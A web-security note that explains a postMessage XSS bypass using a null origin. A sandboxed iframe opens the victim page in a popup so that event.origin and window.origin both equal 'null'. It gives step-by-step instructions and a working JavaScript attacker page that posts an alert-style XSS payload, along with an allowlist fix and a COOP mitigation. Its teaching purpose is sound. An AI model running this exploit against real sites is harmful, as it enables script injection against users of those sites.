
postMessage based XSS

Null Origin Bypass

If the only origin check in the message handler is a comparison against the receiving page's own origin, like the following:

    window.addEventListener('message', function(event) {
      // Drops messages whose sender origin differs from this document's origin
      if (event.origin !== window.origin) {
        return;
      }
      // Process message
    });

then the check passes whenever both sides serialize to the same origin string. A document with an opaque origin (one loaded in a sandboxed iframe without allow-same-origin, or a popup that inherits that sandbox) reports window.origin === "null", and a message sent from such a document arrives with event.origin === "null".

You can bypass it as follows:

  • Start your own HTTP server and serve a page from it.
  • On that page, add an iframe with the attribute sandbox="allow-scripts allow-popups". Without allow-same-origin the iframe's document gets an opaque origin, and without allow-popups-to-escape-sandbox any window it opens inherits the same sandbox flags.
  • From inside the iframe, open the vulnerable page in a new window with window.open(). Because the popup inherits the sandbox, the vulnerable page now runs with an opaque origin as well. A popup is not a frame, so X-Frame-Options or a CSP frame-ancestors directive on the vulnerable page does not prevent this.
  • From the iframe, call postMessage on the popup handle with targetOrigin "*" (an opaque origin cannot be named as a targetOrigin). Inside the popup both event.origin and window.origin are "null", so the comparison above passes and the message is processed.

The fix is to compare event.origin against an explicit allowlist of expected origins instead of against window.origin, and never to accept "null".

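The recipe above written out as code. This is an added example, not code from the original page or from CTBB: it builds the attacker page with the sandboxed iframe, shows the iframe script that opens the vulnerable page and messages it, and puts the vulnerable comparison next to an allowlist check that rejects opaque senders. VICTIM_URL, the payload shape in the message, and the contents of TRUSTED_ORIGINS are assumed placeholders.

```javascript
// Added example, not code from the original page: the null-origin bypass as an
// attacker page, beside the vulnerable check and a hardened replacement.
// VICTIM_URL, the message payload and TRUSTED_ORIGINS are assumed placeholders.

const VICTIM_URL = "https://victim.example/page-with-listener"; // assumed

// The comparison from the vulnerable handler, factored out so it can be
// evaluated with the origin strings the bypass actually produces.
function vulnerableOriginCheck(eventOrigin, windowOrigin) {
  return eventOrigin === windowOrigin;
}

// Script that runs inside the attacker's sandboxed iframe. The iframe has
// allow-scripts and allow-popups but not allow-same-origin, so its document
// has an opaque origin that serializes as "null". It also lacks
// allow-popups-to-escape-sandbox, so the popup it opens inherits the sandbox:
// the victim page loaded in that popup reports window.origin === "null", and a
// message from the iframe arrives there with event.origin === "null".
const IFRAME_SCRIPT = `
  var popup = window.open(${JSON.stringify(VICTIM_URL)});
  // targetOrigin has to be "*": an opaque origin cannot be named in postMessage.
  // The payload shape is assumed; it depends on what the handler does with event.data.
  setTimeout(function () {
    popup.postMessage({ html: "<img src=x onerror=alert(origin)>" }, "*");
  }, 3000);
`;

// Minimal HTML attribute escaping so the iframe script can be carried in srcdoc;
// the inner document's parser decodes the entities again before running it.
function escapeAttr(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;")
          .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// The page served from the attacker's own HTTP server.
function buildAttackerPage() {
  const srcdoc = `<script>${IFRAME_SCRIPT}</script>`;
  return `<!doctype html>
<iframe sandbox="allow-scripts allow-popups" srcdoc="${escapeAttr(srcdoc)}"></iframe>
`;
}

// Hardened receiver check: an explicit allowlist of serialized origins. "null"
// is never a member, so opaque senders are rejected, and the receiver's own
// origin (which can itself be "null") is not used as the reference at all.
const TRUSTED_ORIGINS = new Set(["https://victim.example"]); // assumed

function originIsTrusted(origin) {
  return origin !== "null" && TRUSTED_ORIGINS.has(origin);
}

// Registration is guarded so the module also loads outside a browser.
if (typeof window !== "undefined") {
  window.addEventListener("message", function (event) {
    if (!originIsTrusted(event.origin)) return;
    // Process event.data
  });
}
```

Serve the output of buildAttackerPage() from your own server and load it in a browser; the fixed delay before postMessage is a naive wait for the popup to finish loading. Two things stop the chain: the vulnerable page adopting the allowlist check, or it sending Cross-Origin-Opener-Policy, which severs the opener's handle to the popup so the message never reaches it.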

Ref: CTBB 
